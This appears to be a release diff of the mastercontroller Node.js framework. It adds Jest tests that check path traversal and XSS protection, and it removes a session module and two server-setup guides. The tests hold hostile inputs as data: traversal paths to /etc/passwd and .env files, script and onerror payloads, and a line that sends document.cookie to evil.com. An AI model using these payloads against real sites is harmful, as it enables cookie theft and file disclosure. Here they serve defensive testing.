mastercontroller 1.3.1 → 1.3.3

package/test/security/path-traversal.test.js

@@ -0,0 +1,222 @@
+// Path Traversal Protection Tests
+const master = require('../../MasterControl');
+require('../../MasterAction');
+require('../../MasterHtml');
+
+describe('Path Traversal Protection', () => {
+
+	describe('MasterAction - returnPartialView()', () => {
+		class MockController {
+			constructor() {
+				Object.assign(this, master.controllerExtensions);
+				this.__requestObject = {
+					response: {
+						_headerSent: false,
+						headersSent: false,
+						writeHead: jest.fn(),
+						end: jest.fn()
+					}
+				};
+			}
+
+			returnError(code, message) {
+				this.__requestObject.response.writeHead(code, { 'Content-Type': 'application/json' });
+				this.__requestObject.response.end(JSON.stringify({ error: message }));
+			}
+		}
+
+		test('should reject ../ path traversal', () => {
+			const controller = new MockController();
+			const result = controller.returnPartialView('../../etc/passwd', {});
+
+			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
+			expect(result).toBe('');
+		});
+
+		test('should reject absolute paths', () => {
+			const controller = new MockController();
+			const result = controller.returnPartialView('/etc/passwd', {});
+
+			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
+			expect(result).toBe('');
+		});
+
+		test('should reject ~ home directory paths', () => {
+			const controller = new MockController();
+			const result = controller.returnPartialView('~/../../etc/passwd', {});
+
+			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
+			expect(result).toBe('');
+		});
+
+		test('should allow safe relative paths', () => {
+			const controller = new MockController();
+			master.root = __dirname;
+
+			// This should not throw (though file may not exist)
+			try {
+				controller.returnPartialView('views/safe/partial.html', {});
+			} catch (e) {
+				// File not found is OK, as long as validation passed
+			}
+
+			// Should not have called returnError with 400 or 403
+			const calls = controller.__requestObject.response.writeHead.mock.calls;
+			const hasSecurityError = calls.some(call => [400, 403].includes(call[0]));
+			expect(hasSecurityError).toBe(false);
+		});
+	});
+
+	describe('MasterAction - returnViewWithoutEngine()', () => {
+		class MockController {
+			constructor() {
+				Object.assign(this, master.controllerExtensions);
+				this.__requestObject = {
+					response: {
+						_headerSent: false,
+						headersSent: false,
+						writeHead: jest.fn(),
+						end: jest.fn()
+					}
+				};
+			}
+
+			returnError(code, message) {
+				this.__requestObject.response.writeHead(code, { 'Content-Type': 'application/json' });
+				this.__requestObject.response.end(JSON.stringify({ error: message }));
+			}
+		}
+
+		test('should reject ../ path traversal', () => {
+			const controller = new MockController();
+			controller.returnViewWithoutEngine('../../../etc/passwd');
+
+			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
+		});
+
+		test('should reject absolute paths', () => {
+			const controller = new MockController();
+			controller.returnViewWithoutEngine('/etc/passwd');
+
+			expect(controller.__requestObject.response.writeHead).toHaveBeenCalledWith(400, expect.any(Object));
+		});
+	});
+
+	describe('MasterHtml - renderPartial()', () => {
+		let html;
+
+		beforeEach(() => {
+			html = master.viewList.html;
+			master.router.currentRoute = {
+				root: __dirname
+			};
+		});
+
+		test('should reject ../ path traversal', () => {
+			const result = html.renderPartial('../../etc/passwd', {});
+			expect(result).toBe('<!-- Invalid path -->');
+		});
+
+		test('should reject absolute paths', () => {
+			const result = html.renderPartial('/etc/passwd', {});
+			expect(result).toBe('<!-- Invalid path -->');
+		});
+
+		test('should reject ~ home directory', () => {
+			const result = html.renderPartial('~/config', {});
+			expect(result).toBe('<!-- Invalid path -->');
+		});
+
+		test('should allow safe relative paths', () => {
+			// Safe path should not return error
+			try {
+				const result = html.renderPartial('partials/safe.html', {});
+				// May return "not found" comment, but not "invalid path"
+				expect(result).not.toBe('<!-- Invalid path -->');
+			} catch (e) {
+				// File not found is OK
+			}
+		});
+	});
+
+	describe('MasterHtml - renderStyles()', () => {
+		let html;
+
+		beforeEach(() => {
+			html = master.viewList.html;
+			master.router.currentRoute = {
+				root: __dirname,
+				isComponent: false
+			};
+		});
+
+		test('should reject ../ in folder name', () => {
+			const result = html.renderStyles('../../../etc', ['css']);
+			expect(result).toBe('');
+		});
+
+		test('should reject absolute paths in folder name', () => {
+			const result = html.renderStyles('/etc/passwd', ['css']);
+			expect(result).toBe('');
+		});
+
+		test('should allow safe folder names', () => {
+			const result = html.renderStyles('pages', ['css']);
+			// Should return empty string if no files, but not fail validation
+			expect(typeof result).toBe('string');
+		});
+	});
+
+	describe('MasterHtml - renderScripts()', () => {
+		let html;
+
+		beforeEach(() => {
+			html = master.viewList.html;
+			master.router.currentRoute = {
+				root: __dirname,
+				isComponent: false
+			};
+		});
+
+		test('should reject ../ in folder name', () => {
+			const result = html.renderScripts('../../config', ['js']);
+			expect(result).toBe('');
+		});
+
+		test('should reject absolute paths', () => {
+			const result = html.renderScripts('/etc', ['js']);
+			expect(result).toBe('');
+		});
+
+		test('should allow safe folder names', () => {
+			const result = html.renderScripts('components', ['js']);
+			expect(typeof result).toBe('string');
+		});
+	});
+
+	describe('Real-World Attack Scenarios', () => {
+		test('should prevent reading /etc/passwd', () => {
+			const html = master.viewList.html;
+			master.router.currentRoute = { root: '/var/www/app' };
+
+			const result = html.renderPartial('../../../../../../../etc/passwd', {});
+			expect(result).toBe('<!-- Invalid path -->');
+		});
+
+		test('should prevent reading application config', () => {
+			const html = master.viewList.html;
+			master.router.currentRoute = { root: '/var/www/app' };
+
+			const result = html.renderPartial('../../config/database.yml', {});
+			expect(result).toBe('<!-- Invalid path -->');
+		});
+
+		test('should prevent reading .env files', () => {
+			const html = master.viewList.html;
+			master.router.currentRoute = { root: '/var/www/app' };
+
+			const result = html.renderPartial('../../.env', {});
+			expect(result).toBe('<!-- Invalid path -->');
+		});
+	});
+});

package/test/security/xss.test.js

@@ -0,0 +1,190 @@
+// XSS Protection Tests for MasterHtml.js
+const master = require('../../MasterControl');
+require('../../MasterHtml');
+
+describe('XSS Protection in Form Helpers', () => {
+	let html;
+
+	beforeEach(() => {
+		// Create html instance (it's extended to master.viewList)
+		html = master.viewList.html;
+	});
+
+	describe('linkTo()', () => {
+		test('should escape malicious script in name', () => {
+			const result = html.linkTo('<script>alert("XSS")</script>', '/safe');
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape malicious javascript in href', () => {
+			const result = html.linkTo('Click', 'javascript:alert("XSS")');
+			expect(result).toContain('href="javascript');
+			expect(result).not.toContain('href=javascript'); // Should be quoted
+		});
+
+		test('should escape quote injection', () => {
+			const result = html.linkTo('Click', '" onmouseover="alert(\'XSS\')"');
+			expect(result).toContain('&quot;');
+			expect(result).not.toContain('onmouseover=');
+		});
+	});
+
+	describe('imgTag()', () => {
+		test('should escape XSS in alt attribute', () => {
+			const result = html.imgTag('<script>alert("XSS")</script>', '/image.jpg');
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape onerror handler', () => {
+			const result = html.imgTag('test', '/image.jpg onerror=alert(1)');
+			expect(result).toContain('&quot;');
+			expect(result).toMatch(/src=".*onerror.*"/); // Should be quoted
+		});
+
+		test('should have proper attribute quoting', () => {
+			const result = html.imgTag('test', '/image.jpg');
+			expect(result).toMatch(/src="[^"]+"/);
+			expect(result).toMatch(/alt="[^"]+"/);
+		});
+	});
+
+	describe('textFieldTag()', () => {
+		test('should escape malicious name', () => {
+			const result = html.textFieldTag('<script>alert(1)</script>', {});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape malicious attributes', () => {
+			const result = html.textFieldTag('username', {
+				value: '"><script>alert(1)</script><input type="hidden'
+			});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&quot;&gt;&lt;script&gt;');
+		});
+
+		test('should properly quote all attributes', () => {
+			const result = html.textFieldTag('test', { value: 'normal', class: 'form-control' });
+			expect(result).toMatch(/name="[^"]+"/);
+			expect(result).toMatch(/value="[^"]+"/);
+			expect(result).toMatch(/class="[^"]+"/);
+		});
+	});
+
+	describe('hiddenFieldTag()', () => {
+		test('should escape malicious value', () => {
+			const result = html.hiddenFieldTag('test', '" onclick="alert(\'XSS\')"', {});
+			expect(result).not.toContain('onclick=');
+			expect(result).toContain('&quot;');
+		});
+
+		test('should escape additional attributes', () => {
+			const result = html.hiddenFieldTag('id', '123', {
+				'data-foo': '"><script>alert(1)</script>'
+			});
+			expect(result).not.toContain('<script>');
+		});
+	});
+
+	describe('textAreaTag()', () => {
+		test('should escape message content', () => {
+			const result = html.textAreaTag('comment', '<script>alert("XSS")</script>', {});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape attributes', () => {
+			const result = html.textAreaTag('comment', 'safe', {
+				placeholder: '"><script>alert(1)</script>'
+			});
+			expect(result).not.toContain('<script>');
+		});
+	});
+
+	describe('submitButton()', () => {
+		test('should escape button name', () => {
+			const result = html.submitButton('<script>alert(1)</script>', {});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape attributes', () => {
+			const result = html.submitButton('Submit', {
+				onclick: 'alert(1)'
+			});
+			expect(result).toContain('onclick="alert(1)"'); // Escaped and quoted
+		});
+	});
+
+	describe('emailField()', () => {
+		test('should escape malicious attributes', () => {
+			const result = html.emailField('email', {
+				value: '"><script>alert(1)</script>'
+			});
+			expect(result).not.toContain('<script>');
+		});
+	});
+
+	describe('numberField()', () => {
+		test('should escape min/max/step values', () => {
+			const result = html.numberField('age', '"><script>alert(1)</script>', '100', '1', {});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&quot;&gt;&lt;script&gt;');
+		});
+	});
+
+	describe('javaScriptSerializer()', () => {
+		test('should escape closing script tags', () => {
+			const data = { comment: '</script><script>alert("XSS")</script>' };
+			const result = html.javaScriptSerializer('userData', data);
+
+			// Should not contain unescaped </script>
+			expect(result).not.toMatch(/<\/script><script>/);
+			// Should contain escaped version
+			expect(result).toContain('\\u003c/script\\u003e');
+		});
+
+		test('should escape < and > characters', () => {
+			const data = { html: '<div>test</div>' };
+			const result = html.javaScriptSerializer('config', data);
+
+			expect(result).toContain('\\u003c');
+			expect(result).toContain('\\u003e');
+		});
+
+		test('should escape variable name', () => {
+			const result = html.javaScriptSerializer('<script>alert(1)</script>', { test: 'data' });
+			expect(result).toContain('&lt;script&gt;');
+		});
+	});
+
+	describe('Real-World Attack Scenarios', () => {
+		test('should prevent stored XSS attack', () => {
+			// Simulate stored XSS from database
+			const userComment = '<img src=x onerror=alert(document.cookie)>';
+			const result = html.textAreaTag('comment', userComment, {});
+
+			expect(result).not.toContain('onerror=');
+			expect(result).toContain('&lt;img');
+		});
+
+		test('should prevent reflected XSS attack', () => {
+			// Simulate reflected XSS from URL parameter
+			const searchQuery = '"><script>fetch("http://evil.com?c="+document.cookie)</script>';
+			const result = html.textFieldTag('search', { value: searchQuery });
+
+			expect(result).not.toContain('<script>');
+			expect(result).not.toContain('fetch(');
+		});
+
+		test('should prevent DOM-based XSS', () => {
+			const maliciousUrl = 'javascript:eval(atob("YWxlcnQoMSk="))';
+			const result = html.linkTo('Click', maliciousUrl);
+
+			// Should be quoted and escaped
+			expect(result).toMatch(/href="[^"]*"/);
+		});
+	});
+});

package/MasterSession.js

@@ -1,208 +0,0 @@
- 
-// version 0.0.22
-
-var master = require('./MasterControl');
-var cookie = require('cookie');
-var toolClass =  require('./MasterTools');
-var crypto = require('crypto');
-var tools = new toolClass();
-
-class MasterSession{
- 
-    sessions = {};
-    options = {
-        domain: undefined,
-        encode : undefined,
-        maxAge: 900000,
-        expires : undefined ,
-        secure:false,
-        httpOnly:true,
-        sameSite : true,
-        path : '/',
-        secret : this.createSessionID()
-    };
-
-    init(options){
-        var $that = this;
-
-        // Combine the rest of the options carefully
-        this.options = {
-            ...this.options,
-            ...options
-        };
-
-        if(this.options.TID){
-            this.options.secret = TID;
-        }
-
-        // Auto-register with pipeline if available
-        if (master.pipeline) {
-            master.pipeline.use(this.middleware());
-        }
-
-        return {
-            setPath : function(path){
-                $that.options.path = path === undefined ? '/' : path;
-                return this;
-            },
-            sameSiteTrue : function(){
-                $that.options.sameSite = true;
-                return this;
-            },
-            sameSiteFalse : function(){
-                $that.options.sameSite = false;
-                return this;
-            },
-            httpOnlyTrue : function(){
-                $that.options.httpOnly = true;
-                return this;
-            },
-            httpOnlyFalse : function(){
-                $that.options.httpOnly = false;
-                return this;
-            },
-            secureTrue : function(){
-                $that.options.secure = true;
-                return this;
-            },
-            securefalse : function(){
-                $that.options.secure = false;
-                return this;
-            },
-            expires : function(exp){
-                $that.options.expires = exp === undefined ? undefined : exp;
-                return this;
-            },
-            maxAge : function(num){
-                $that.options.maxAge = num === undefined ? 0 : num;
-                return this;
-            },
-            encode: function(func){
-                $that.options.encode = func;
-                return this;
-            },
-            domain : function(dom){
-                $that.options.domain = dom;
-                return this;
-            }
-        };
-    }
-
-    createSessionID(){
-        return crypto.randomBytes(20).toString('hex');
-    }
-
-    getSessionID(){
-         return this.secret;
-    }
-
-    setCookie(name, payload, response, options){
-        var cookieOpt = options === undefined? this.options : options;
-        if(typeof options === "object"){
-            if(options.secret){
-                response.setHeader('Set-Cookie', cookie.serialize(name, tools.encrypt(payload, cookieOpt.secret), cookieOpt));
-            }else{
-
-                response.setHeader('Set-Cookie', cookie.serialize(name, payload, cookieOpt));
-       
-            }
-
-        }
-        else{
-            response.setHeader('Set-Cookie', cookie.serialize(name, payload, cookieOpt));
-        }
-    }
-
-    getCookie (name, request, secret){
-        var cooks = cookie.parse(request.headers.cookie || '');
-
-        if(cooks){
-            if(cooks[name] === undefined){
-                return -1;
-            }
-            if(secret === undefined){
-                if(cooks[name]){
-                    return cooks[name];
-                }
-                else{
-                    return  -1;
-                }
-                //return cooks[name]? -1 : cooks[name];
-            }
-            else{
-                return tools.decrypt(cooks[name], secret);
-            }
-        }
-        else{
-            return -1;
-        }
-    }
-
-    deleteCookie (name, response, options){
-        var cookieOpt = options === undefined? this.options : options;
-        response.setHeader('Set-Cookie', cookie.serialize(name, "", cookieOpt));
-        cookieOpt.expires = undefined;
-    }
-
-    // delete session and cookie
-    delete(name, response){
-        var sessionID = sessions[name];
-        this.options.expires = new Date(0);
-        response.setHeader('Set-Cookie', cookie.serialize(sessionID, "", this.options));
-        delete this.sessions[name];
-        this.options.expires = undefined;
-    }
-
-    // resets all sessions
-    reset(){
-        this.sessions = {};
-    }
-
-    // sets session with random id to get cookie
-    set(name, payload, response, secret, options){
-        var cookieOpt = options === undefined? this.options : options; 
-        var sessionID = this.createSessionID();
-        this.sessions[name] = sessionID;
-        if(secret === undefined){
-            response.setHeader('Set-Cookie', cookie.serialize(sessionID, JSON.stringify(payload), cookieOpt));
-        }
-        else{
-            response.setHeader('Set-Cookie', cookie.serialize(sessionID, tools.encrypt(payload, secret), cookieOpt));
-        }
-    }
-
-    // gets session then gets cookie
-    get(name, request, secret){
-        var sessionID = this.sessions[name];
-        if(sessionID){
-            var cooks = cookie.parse(request.headers.cookie || '');
-            if(cooks){
-                if(secret === undefined){
-                    return cooks[sessionID];
-                }
-                else{
-                   return tools.decrypt(cooks[sessionID], secret);
-                }
-            }
-        }
-        else{
-            return -1;
-        }
-    }
-
-    /**
-     * Get session middleware for the pipeline
-     * Sessions are accessed lazily via master.sessions in controllers
-     */
-    middleware() {
-        var $that = this;
-
-        return async (ctx, next) => {
-            // Sessions are available via master.sessions.get/set in controllers
-            // No action needed here - just continue pipeline
-            await next();
-        };
-    }
-}
-
-master.extend("sessions", MasterSession);

package/docs/server-setup-hostname-binding.md

@@ -1,24 +0,0 @@
-## Server setup: Hostname binding
-
-Bind the listener to a specific interface using `hostname` (or `host`/`http`).
-
-### server.js
-```js
-const master = require('./MasterControl');
-
-master.root = __dirname;
-master.environmentType = process.env.NODE_ENV || 'development';
-
-const server = master.setupServer('http');
-master.start(server);
-
-// Bind to localhost only
-master.serverSettings({ httpPort: 3000, hostname: '127.0.0.1', requestTimeout: 60000 });
-
-master.startMVC('app');
-```
-
-### Notes
-- Use `0.0.0.0` to accept connections on all interfaces.
-- In production with a reverse proxy, bind to `127.0.0.1` so only the proxy can reach the app.
-

package/docs/server-setup-http.md

@@ -1,32 +0,0 @@
-## Server setup: HTTP
-
-This example starts a plain HTTP server. Useful for local development, or when you run behind a reverse proxy that terminates TLS.
-
-### server.js (HTTP)
-```js
-const master = require('./MasterControl');
-
-// Point master to your project root and environment
-master.root = __dirname;
-master.environmentType = process.env.NODE_ENV || 'development';
-
-// Create HTTP server and bind it
-const server = master.setupServer('http');
-master.start(server);
-
-// Use either explicit settings or your environment JSON
-// Option A: explicit
-// master.serverSettings({ httpPort: 3000, hostname: '127.0.0.1', requestTimeout: 60000 });
-
-// Option B: from env config at config/environments/env.<env>.json
-master.serverSettings(master.env.server);
-
-// Load your routes and controllers
-// If your routes are under <root>/app/**/routes.js
-master.startMVC('app');
-```
-
-### Notes
-- `master.serverSettings` now honors `hostname` (or `host`/`http`) if provided; otherwise it listens on all interfaces.
-- For production, prefer running behind a reverse proxy and keep the app on a high port (e.g., 3000).
-